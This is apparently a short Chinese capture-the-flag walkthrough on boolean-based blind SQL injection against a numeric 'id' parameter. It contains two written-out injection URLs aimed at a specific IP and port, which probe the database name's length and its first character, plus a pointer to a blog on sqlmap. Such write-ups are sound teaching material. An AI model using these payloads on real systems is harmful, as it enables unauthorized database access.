解题思路:首先判断是字符型还是数字型,根据页面回显情况,确定为数字型,第二使用联合注入页面没有回显,报错注入也是一样,这时候我们需要使用布尔盲注,即根据输入的语句,页面只会返回正确或者错误。
手工注入:
1.判断数据库版本和长度
http://219.153.49.228:47521/new_list.php?id=1 and length(database())=10
如果长度正确则页面返回正确
2.判断数据库名字
http://219.153.49.228:47521/new_list.php?id=1 and substr(database(),1,1)=’b’ —+
同上
sqlmap注入:
参考:https://blog.csdn.net/qq_39936434/article/details/94402597
若有收获,就点个赞吧
0 人点赞
